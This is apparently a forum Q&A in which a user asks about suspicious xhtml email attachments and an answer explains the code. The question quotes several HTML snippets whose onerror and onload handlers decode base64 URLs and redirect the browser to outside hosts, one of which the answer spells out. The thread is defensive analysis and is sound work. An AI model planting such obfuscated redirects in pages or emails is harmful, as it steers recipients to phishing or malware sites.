# JS Virus in mail?

Tags: javascript, virus

I receive emails with some `xhtml` files. I find these files to be suspicious. They contain JS code:

```
<video src="123" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));">

<img src="awbdsdrDYZZZCN33.jpg" onerror="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MzEyNjg4ODA3NjM3Mzc1NzEg');">  

<body onload="document.location.replace(window.atob('aHR0cDovL3J1c25nLnByby80d1FKZEQ/NTU2MzQ2NzY1MzIwNjI1MSA='));" />

<link rel="stylesheet" type="text/css" href="1.css" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NDg0NDUwNTc4NzAxMjMyIA=='));" />

<body onload="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MTE1MzQ1MDI0NTExMDQ2NzM0NCA=');" />
```

I am wondering how malicious this codes is. And what action do these files do with OS?

Answer (score 2, accepted):

It redirects you to `http://keitaro0001.pro/DcLtdS?7324243812487758`.

It purposefully uses an incorrect `src` property to fire the `error` event (since the file at that source does not exist), executing the JS in the `onerror` attribute:

```js
document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));
```

The string in question is base64 encoded. [`window.atob`](https://developer.mozilla.org/en-US/docs/Web/API/atob) decodes the base64 encoded string (which is the URL above) and assigns it to the URL.

Comment: I correctly understand the transition should be explicit, I mean that this code does not call any hidden services for the transition? And since my email client and browser didn't make this transition, why should I worry?  I badly know JS, so I ask practicing devs.

Comment: @Pro What do you mean by "transition"?

Comment: I mean Transition - follow this link.